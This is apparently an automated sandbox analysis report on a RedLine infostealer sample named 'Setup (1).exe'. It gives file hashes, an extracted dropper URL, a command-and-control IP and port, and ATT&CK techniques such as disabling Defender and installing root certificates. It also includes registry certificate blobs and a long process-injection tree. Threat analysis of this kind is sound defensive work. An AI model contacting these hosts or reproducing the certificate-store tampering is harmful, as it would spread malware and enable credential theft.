redline | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (1).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score

10^/10

redline dibild2 evasion infostealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/ra/ALL.txt

Extracted

Family

redline

Botnet

dibild2

135.148.139.222:1494

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 13 IoCs

resource	yara_rule
behavioral1/memory/3040-200-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/3040-199-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/436-198-0x0000000002DE0000-0x0000000002DFC000-memory.dmp	family_redline
behavioral1/memory/3040-201-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/324-206-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/2228-213-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/1744-216-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/1496-224-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/1056-231-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/1652-242-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/2096-262-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/2660-275-0x000000000041A616-mapping.dmp	family_redline
behavioral1/memory/2640-249-0x000000000041A616-mapping.dmp	family_redline

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

pid	Process
1352	QkPaHsOYJoess5RIDvhh16di.exe
1692	PAJiQU5FHISnnILKza_1vINi.exe
940	DGdRJdjYMp1D2RpLYKBui1LY.exe
1092	WUJRmyfb7Rf5IhYlAP1LLfbk.exe
932	BYigjZqBO6919Fxun020c5es.exe
876	m6R2P9LOEn25mfpBVIZGGIdJ.exe
1320	pePjKdtgRUa91FYCzQo5PvPU.exe
316	guWmD5gHjZRUtxL0_ytfPMm8.exe
1612	C1x9o7mNpSzD4E1OmpDO0QGF.exe
1348	6ve9HxB5TNvAupA2OnmdALMD.exe
1576	2DtSA092jQqFAeQJHjYewdI5.exe
656	OTX6AMcaGzkewpXrPWZY01H2.exe
740	IA6nXySJpPF0J9uVr5kqHiBx.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\International\Geo\Nation	Setup (1).exe

Loads dropped DLL 24 IoCs

pid	Process
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Setup (1).exe
1816	Process not Found
1816	Process not Found
1816	Process not Found
1816	Process not Found
1816	Process not Found

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00030000000131a7-146.dat	themida
behavioral1/files/0x0003000000013194-150.dat	themida
behavioral1/files/0x0003000000013193-111.dat	themida
behavioral1/files/0x0003000000013194-115.dat	themida
behavioral1/files/0x0003000000013193-148.dat	themida
behavioral1/memory/952-185-0x0000000000880000-0x0000000000881000-memory.dmp	themida
behavioral1/memory/812-189-0x00000000001C0000-0x00000000001C1000-memory.dmp	themida

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ipinfo.io
22	ipinfo.io
751	api.2ip.ua
760	api.2ip.ua

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
644	1704	WerFault.exe	54
2144	932	WerFault.exe	34

Kills process with taskkill 3 IoCs

evasion

pid	Process
1864	taskkill.exe
1236	taskkill.exe
2808	taskkill.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Setup (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Setup (1).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Setup (1).exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1816	Setup (1).exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 1692	1816	Setup (1).exe	31
PID 1816 wrote to memory of 1692	1816	Setup (1).exe	31
PID 1816 wrote to memory of 1692	1816	Setup (1).exe	31
PID 1816 wrote to memory of 1692	1816	Setup (1).exe	31
PID 1816 wrote to memory of 940	1816	Setup (1).exe	33
PID 1816 wrote to memory of 940	1816	Setup (1).exe	33
PID 1816 wrote to memory of 940	1816	Setup (1).exe	33
PID 1816 wrote to memory of 940	1816	Setup (1).exe	33
PID 1816 wrote to memory of 1092	1816	Setup (1).exe	35
PID 1816 wrote to memory of 1092	1816	Setup (1).exe	35
PID 1816 wrote to memory of 1092	1816	Setup (1).exe	35
PID 1816 wrote to memory of 1092	1816	Setup (1).exe	35
PID 1816 wrote to memory of 932	1816	Setup (1).exe	34
PID 1816 wrote to memory of 932	1816	Setup (1).exe	34
PID 1816 wrote to memory of 932	1816	Setup (1).exe	34
PID 1816 wrote to memory of 932	1816	Setup (1).exe	34
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 316	1816	Setup (1).exe	37
PID 1816 wrote to memory of 1348	1816	Setup (1).exe	43
PID 1816 wrote to memory of 1348	1816	Setup (1).exe	43
PID 1816 wrote to memory of 1348	1816	Setup (1).exe	43
PID 1816 wrote to memory of 1348	1816	Setup (1).exe	43
PID 1816 wrote to memory of 1612	1816	Setup (1).exe	42
PID 1816 wrote to memory of 1612	1816	Setup (1).exe	42
PID 1816 wrote to memory of 1612	1816	Setup (1).exe	42
PID 1816 wrote to memory of 1612	1816	Setup (1).exe	42
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 876	1816	Setup (1).exe	41
PID 1816 wrote to memory of 1576	1816	Setup (1).exe	40
PID 1816 wrote to memory of 1576	1816	Setup (1).exe	40
PID 1816 wrote to memory of 1576	1816	Setup (1).exe	40
PID 1816 wrote to memory of 1576	1816	Setup (1).exe	40
PID 1816 wrote to memory of 1320	1816	Setup (1).exe	39
PID 1816 wrote to memory of 1320	1816	Setup (1).exe	39
PID 1816 wrote to memory of 1320	1816	Setup (1).exe	39
PID 1816 wrote to memory of 1320	1816	Setup (1).exe	39
PID 1816 wrote to memory of 740	1816	Setup (1).exe	45
PID 1816 wrote to memory of 740	1816	Setup (1).exe	45
PID 1816 wrote to memory of 740	1816	Setup (1).exe	45
PID 1816 wrote to memory of 740	1816	Setup (1).exe	45
PID 1816 wrote to memory of 656	1816	Setup (1).exe	44
PID 1816 wrote to memory of 656	1816	Setup (1).exe	44
PID 1816 wrote to memory of 656	1816	Setup (1).exe	44
PID 1816 wrote to memory of 656	1816	Setup (1).exe	44
PID 1816 wrote to memory of 1384	1816	Process not Found	59
PID 1816 wrote to memory of 1384	1816	Process not Found	59
PID 1816 wrote to memory of 1384	1816	Process not Found	59
PID 1816 wrote to memory of 1384	1816	Process not Found	59
PID 1816 wrote to memory of 1812	1816	Process not Found	57
PID 1816 wrote to memory of 1812	1816	Process not Found	57
PID 1816 wrote to memory of 1812	1816	Process not Found	57
PID 1816 wrote to memory of 1812	1816	Process not Found	57
PID 1816 wrote to memory of 812	1816	Process not Found	56
PID 1816 wrote to memory of 812	1816	Process not Found	56

C:\Users\Admin\AppData\Local\Temp\Setup (1).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Users\Admin\Documents\PAJiQU5FHISnnILKza_1vINi.exe
  "C:\Users\Admin\Documents\PAJiQU5FHISnnILKza_1vINi.exe"
  2⤵
  - Executes dropped EXE
  PID:1692
- - C:\Users\Admin\Documents\PAJiQU5FHISnnILKza_1vINi.exe
    "C:\Users\Admin\Documents\PAJiQU5FHISnnILKza_1vINi.exe"
    3⤵
    PID:2284
- C:\Users\Admin\Documents\QkPaHsOYJoess5RIDvhh16di.exe
  "C:\Users\Admin\Documents\QkPaHsOYJoess5RIDvhh16di.exe"
  2⤵
  - Executes dropped EXE
  PID:1352
- C:\Users\Admin\Documents\DGdRJdjYMp1D2RpLYKBui1LY.exe
  "C:\Users\Admin\Documents\DGdRJdjYMp1D2RpLYKBui1LY.exe"
  2⤵
  - Executes dropped EXE
  PID:940
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
    3⤵
    PID:2436
- C:\Users\Admin\Documents\BYigjZqBO6919Fxun020c5es.exe
  "C:\Users\Admin\Documents\BYigjZqBO6919Fxun020c5es.exe"
  2⤵
  - Executes dropped EXE
  PID:932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 768
    3⤵
    - Program crash
    PID:2144
- C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
  "C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe"
  2⤵
  - Executes dropped EXE
  PID:1092
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3040
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:324
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2228
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1744
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1496
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1056
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1652
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2640
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2660
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2484
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1636
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2268
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2296
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2096
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2388
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2540
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1580
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3012
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1956
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2996
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2304
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1716
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3100
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3172
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3216
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3308
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3352
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3416
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3460
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3504
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3548
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3612
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3648
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3704
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3740
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3808
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3848
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3904
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3936
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3996
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:4032
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2736
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3092
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2940
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3244
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2472
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3368
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1244
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:2968
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:1536
- - C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    C:\Users\Admin\Documents\WUJRmyfb7Rf5IhYlAP1LLfbk.exe
    3⤵
    PID:3628
